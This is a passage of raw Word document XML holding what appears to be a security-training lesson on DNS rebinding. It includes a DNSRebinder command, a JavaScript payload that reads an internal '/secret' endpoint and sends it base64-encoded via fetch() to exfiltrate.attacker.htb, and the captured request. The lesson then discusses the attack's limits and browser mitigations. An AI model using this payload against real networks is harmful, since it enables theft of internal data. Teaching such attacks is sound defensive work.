          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> endpoint from which we want to exfiltrate data:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CACE962" w14:textId="77777777" w:rsidR="00233303" w:rsidRPr="00233303" w:rsidRDefault="00233303" w:rsidP="00233303">
      <w:pPr>
        <w:spacing w:after="0"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Code: javascript</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00823111"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router.get("/secret", async (req, res) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DA11233"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ab/>
        <w:t>return res.status(200).send("This is secret data!");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4743EAC5"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13926E69"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The endpoint does not require authentication because the sysadmin assumed that since it is not publicly accessible, it is safe from attackers, which is false. After configuring the proper DNS </w:t>
      </w:r>
      <w:r w:rsidRPr="00233303">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>NS</w:t>
      </w:r>
      <w:r w:rsidRPr="00233303">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> entry, we can use </w:t>
      </w:r>
      <w:r w:rsidRPr="00233303">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>DNSRebinder</w:t>
      </w:r>
      <w:r w:rsidRPr="00233303">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> for the DNS rebinding attack on our domain </w:t>
      </w:r>
      <w:r w:rsidRPr="00233303">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>http://www.attacker.htb</w:t>
      </w:r>
      <w:r w:rsidRPr="00233303">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">, with the public IP address of our web server replacing </w:t>
      </w:r>
      <w:r w:rsidRPr="00233303">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>$PUBLIC_WEBSERVER_IP</w:t>
      </w:r>
      <w:r w:rsidRPr="00233303">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73A25E0D"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yovecio@htb[/htb]$ sudo python3 dnsrebinder.py --domain www.attacker.htb. --rebind 192.168.178.1 --ip $PUBLIC_WEBSERVER_IP --counter 1 --tcp --udp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36FF037F"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7035F2D4"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Starting nameserver...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60B1AB1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UDP server loop running in thread: Thread-1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AFDB022"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TCP server loop running in thread: Thread-2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="115AB7DC"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Finally, we need to host the following payload on our web server and start our exfiltration server at </w:t>
      </w:r>
      <w:r w:rsidRPr="00233303">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>http://exfiltrate.attacker.htb:1337</w:t>
      </w:r>
      <w:r w:rsidRPr="00233303">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="604C2C8A" w14:textId="77777777" w:rsidR="00233303" w:rsidRPr="00233303" w:rsidRDefault="00233303" w:rsidP="00233303">
      <w:pPr>
        <w:spacing w:after="0"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Code: html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65559E1F"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&lt;script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="209FEBFF"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startAttack();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="322D5C3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1137AE3B"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function startAttack(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2023D7C4"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var xhr = new XMLHttpRequest();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A1934E0"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xhr.open('GET', 'http://www.attacker.htb/secret', true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="540E3177"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xhr.onload = () =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F8C95FF"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fetch('http://exfiltrate.attacker.htb:1337/log?data=' + btoa(xhr.response));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F63237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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69545F2D"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xhr.send();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64D41E1B"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3893ED11"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setTimeout(startAttack, 2000);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DFA774D"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    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CBF7B72"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&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48EFA047"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The payload calls itself every 2 seconds to increase the probability of a successful attack. If a victim accesses our website at </w:t>
      </w:r>
      <w:r w:rsidRPr="00233303">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>http://www.attacker.htb</w:t>
      </w:r>
      <w:r w:rsidRPr="00233303">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>, DNSRebinder executes the DNS rebinding such that we simply have to wait for the request to our exfiltration server:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BE491CB"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 xml:space="preserve">yovecio@htb[/htb]$ python3 -m http.server 1337    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AB9F5F4"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p>
    <w:p w14:paraId="4B1D905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Serving HTTP on 0.0.0.0 port 1337 (http://0.0.0.0:1337/) ...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48375FCD"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127.0.0.1 - - [13/May/2023 10:29:09] code 404, message File not found</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F632187"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127.0.0.1 - - [13/May/2023 10:29:09] "GET /log?data=VGhpcyBpcyBzZWNyZXQgZGF0YSE= HTTP/1.1" 404 -</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6909FAA7"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Simulating the victim, we can see the request accessing the internal web application in Burp:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EE1C4DD" w14:textId="0CAE8FF5"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noProof/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6C86C4E9" wp14:editId="4E8DB32D">
            <wp:extent cx="5731510" cy="1008380"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1270"/>
            <wp:docPr id="1323578471" name="Picture 13235784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08380"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="764A3736"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Afterward, the response is base64 encoded and exfiltrated to the attacker in the following request:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18350629" w14:textId="77777777" w:rsidR="00233303" w:rsidRPr="00233303" w:rsidRDefault="00233303" w:rsidP="00233303">
      <w:pPr>
        <w:spacing w:after="0"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Code: http</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="453A09F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GET /log?data=VGhpcyBpcyBzZWNyZXQgZGF0YSE= HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E9D35F9"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lastRenderedPageBreak/>
        <w:t>Host: exfiltrate.attacker.htb:1337</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="502C8B37"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User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.120 Safari/537.36</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57E59D30"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Accept: */*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ECC1CF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Origin: http://www.attacker.htb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17802A77"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Referer: http://www.attacker.htb/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE9DEF0"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Accept-Encoding: gzip, deflate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="691A7081"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Accept-Language: en-US,en;q=0.9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="365B047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233303">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Connection: close</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CC72FE1"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6084C518" w14:textId="77777777" w:rsidR="00233303" w:rsidRPr="00233303" w:rsidRDefault="00233303" w:rsidP="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608A1B4F"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Therefore, the attacker can successfully exfiltrate secret data, regardless of the web application being only accessible from the internal network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D468DA0" w14:textId="77777777" w:rsidR="00233303" w:rsidRPr="00233303" w:rsidRDefault="00C56D59" w:rsidP="00233303">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:pict w14:anchorId="093D00CE">
          <v:rect id="_x0000_i1028" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="06B40A7F" w14:textId="77777777" w:rsidR="00233303" w:rsidRPr="00233303" w:rsidRDefault="00233303" w:rsidP="002333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SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00233303">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Restrictions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="440355AC"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Internal applications protected by authentication are effectively safe from DNS rebinding attacks because the session cookies of victims are not sent with requests, even if they are logged in to the internal application. That is because the victim's browser thinks it is communicating with the origin </w:t>
      </w:r>
      <w:r w:rsidRPr="00233303">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>http://attacker.htb</w:t>
      </w:r>
      <w:r w:rsidRPr="00233303">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> and thus sends cookies associated with this origin with the request. Potential session cookies stored for the origin </w:t>
      </w:r>
      <w:r w:rsidRPr="00233303">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>http://192.168.178.1</w:t>
      </w:r>
      <w:r w:rsidRPr="00233303">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> are not sent alongside the request since the origin differs, even though the domain name </w:t>
      </w:r>
      <w:r w:rsidRPr="00233303">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>attacker.htb</w:t>
      </w:r>
      <w:r w:rsidRPr="00233303">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> resolves to </w:t>
      </w:r>
      <w:r w:rsidRPr="00233303">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>192.168.178.1</w:t>
      </w:r>
      <w:r w:rsidRPr="00233303">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>. Therefore, attackers cannot perform authenticated actions when conducting DNS rebinding attacks if they do not possess valid credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EFA6F6A"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Since session cookies are not sent alongside requests, targeting publicly accessible applications/endpoints is often inadvisable; however, there are a few exceptions. An example is an IP-based authentication web application, which allows access to only a whitelist of IP addresses. Attackers could bypass these web applications using DNS rebinding. However, CSRF-like vulnerabilities generally do not arise from DNS rebinding since the requests are unauthenticated due to a lack of session cookies in the request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78911DBB"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Modern browsers implement </w:t>
      </w:r>
      <w:r w:rsidRPr="00233303">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>DNS caching</w:t>
      </w:r>
      <w:r w:rsidRPr="00233303">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">, a technique that caches the result of DNS resolutions for a configurable period, regardless of the actual TTL of the DNS record. To bypass </w:t>
      </w:r>
      <w:r w:rsidRPr="00233303">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>DNS caching</w:t>
      </w:r>
      <w:r w:rsidRPr="00233303">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">, we need to wait for this period before the DNS rebinding attack can succeed, which is why our payload called itself every 2 seconds. Firefox provides the </w:t>
      </w:r>
      <w:r w:rsidRPr="00233303">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>network.dnsCacheExpiration</w:t>
      </w:r>
      <w:r w:rsidRPr="00233303">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> setting to alter the caching period.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="722E822C"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Furthermore, in 2023, the WC3 draft specification titled Local Network Access is currently under development to mitigate DNS rebinding vulnerabilities. While this specification is still in progress and has not reached widespread adoption, it holds the potential to become the standard in the latest web browser versions, offering comprehensive protection against DNS rebinding attacks. The draft introduces two new HTTP headers:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D44B9E8" w14:textId="77777777" w:rsidR="00233303" w:rsidRPr="00233303" w:rsidRDefault="00233303" w:rsidP="002333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Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Access-Control-Request-Local-Network</w:t>
      </w:r>
      <w:r w:rsidRPr="00233303">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">: the request header set by the browser if the current origin's IP address makes a request to an origin with a </w:t>
      </w:r>
      <w:r w:rsidRPr="00233303">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>less public</w:t>
      </w:r>
      <w:r w:rsidRPr="00233303">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> IP Address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="509CF716" w14:textId="77777777" w:rsidR="00233303" w:rsidRPr="00233303" w:rsidRDefault="00233303" w:rsidP="002333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Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Access-Control-Allow-Local-Network</w:t>
      </w:r>
      <w:r w:rsidRPr="00233303">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>: the response header set by a web application if the response can be shared with external networks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30BFDFEF"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In this case, </w:t>
      </w:r>
      <w:r w:rsidRPr="00233303">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>less public</w:t>
      </w:r>
      <w:r w:rsidRPr="00233303">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> is defined as any IP address pointing to the local machine (e.g. </w:t>
      </w:r>
      <w:r w:rsidRPr="00233303">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>127.0.0.1</w:t>
      </w:r>
      <w:r w:rsidRPr="00233303">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">) if the origin's IP address is not pointing to the local machine (e.g. </w:t>
      </w:r>
      <w:r w:rsidRPr="00233303">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>192.168.178.1</w:t>
      </w:r>
      <w:r w:rsidRPr="00233303">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">). If the origin's IP address is public, then </w:t>
      </w:r>
      <w:r w:rsidRPr="00233303">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>less public</w:t>
      </w:r>
      <w:r w:rsidRPr="00233303">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> would refer to any any private IP address. This prevents DNS rebinding by considering the IP address an origin resolves to when making a request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BFE9E9A"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In our exploitation example, the origin </w:t>
      </w:r>
      <w:r w:rsidRPr="00233303">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>http://attacker.htb</w:t>
      </w:r>
      <w:r w:rsidRPr="00233303">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> resolves to a </w:t>
      </w:r>
      <w:r w:rsidRPr="00233303">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r w:rsidRPr="00233303">
        <w:rPr>
